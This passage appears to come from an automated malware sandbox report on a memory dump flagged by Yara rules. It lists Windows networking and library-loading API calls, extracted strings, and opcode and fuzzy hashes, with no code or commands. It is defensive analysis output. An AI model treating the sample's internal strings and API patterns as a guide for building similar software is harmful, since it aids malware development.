                                                                                        • Opcode Fuzzy Hash: 2d8ed16fcd44915d8f9224a1a0be733b5163984e5a3ad19b5e89b428712a7df4
                                                                                        • Instruction Fuzzy Hash: DB21D233612211AFCB58EF78C8D06DEBBF9EF20254B2D8459D501DB902CB74E980CB60
                                                                                        APIs
                                                                                        Strings
                                                                                        • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 030FC057
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickwsprintf
                                                                                        • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                        • API String ID: 2424974917-1012700906
                                                                                        • Opcode ID: e8d447b9ef3cd933a861cac0f053cd57223ce89b33e4f393d6cacbdacc9b0732
                                                                                        • Instruction ID: 463e3d2468d2f78b2d66d42bc52278145e3ef03271c342279701c96c764ab768
                                                                                        • Opcode Fuzzy Hash: e8d447b9ef3cd933a861cac0f053cd57223ce89b33e4f393d6cacbdacc9b0732
                                                                                        • Instruction Fuzzy Hash: FD119772100100FFDB429AA9CD44E567FA6FF8C319B34819CF6188E166D633D863EB50
                                                                                        APIs
                                                                                        • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 030F26C3
                                                                                        • inet_ntoa.WS2_32(?), ref: 030F26E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbyaddrinet_ntoa
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2112563974-1857712256
                                                                                        • Opcode ID: 79ecbaf052e9b2c88cb13aa9c54e7364a05a5ba50ae76f505a8251e31037f826
                                                                                        • Instruction ID: ae8e1802fb081d16351e6e17bb64e7a9dee58054154100c18c8ebf62616fbfe7
                                                                                        • Opcode Fuzzy Hash: 79ecbaf052e9b2c88cb13aa9c54e7364a05a5ba50ae76f505a8251e31037f826
                                                                                        • Instruction Fuzzy Hash: BFF0123A1492096FEB04AEA4EC05A9A379CDF0D650F148825FB08DA490DBB1D540D798
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,030FEB54,_alldiv,030FF0B7,80000001,00000000,00989680,00000000,?,?,?,030FE342,00000000,7508EA50,80000001,00000000), ref: 030FEAF2
                                                                                        • GetProcAddress.KERNEL32(76E80000,00000000), ref: 030FEB07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ntdll.dll
                                                                                        • API String ID: 2574300362-2227199552
                                                                                        • Opcode ID: 092da2818e93cd40dde10ee16209d921312dad030566d336e223566fd8e64278
                                                                                        • Instruction ID: 6dba2ff22aeec8542e6ce8edd15aad056922460bc8bf33cbf43dc9f018674b3e
                                                                                        • Opcode Fuzzy Hash: 092da2818e93cd40dde10ee16209d921312dad030566d336e223566fd8e64278
                                                                                        • Instruction Fuzzy Hash: 17D0C7386013025FCF59AF65D60A90B7ADC678C7497808455A516C1519DBB4D484D620
                                                                                        APIs
                                                                                          • Part of subcall function 030F2D21: GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,030F2F01,?,030F20FF,03102000), ref: 030F2D3A
                                                                                          • Part of subcall function 030F2D21: LoadLibraryA.KERNEL32(?), ref: 030F2D4A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 030F2F73
                                                                                        • HeapFree.KERNEL32(00000000), ref: 030F2F7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: e7fd4f051ad3f840e5e205631d23feb8a1ee4e8bc1614b35d64bb1ebc76d7632
                                                                                        • Instruction ID: e66f65772fbbbbea1a87c24bd3d92e094efcc11eafd6a6d9765f6d2cf074d332
                                                                                        • Opcode Fuzzy Hash: e7fd4f051ad3f840e5e205631d23feb8a1ee4e8bc1614b35d64bb1ebc76d7632
                                                                                        • Instruction Fuzzy Hash: D051D07990120A9FCF05DF64D8889FAB7B9FF09304F1445A9EE96C7610E732DA19CB90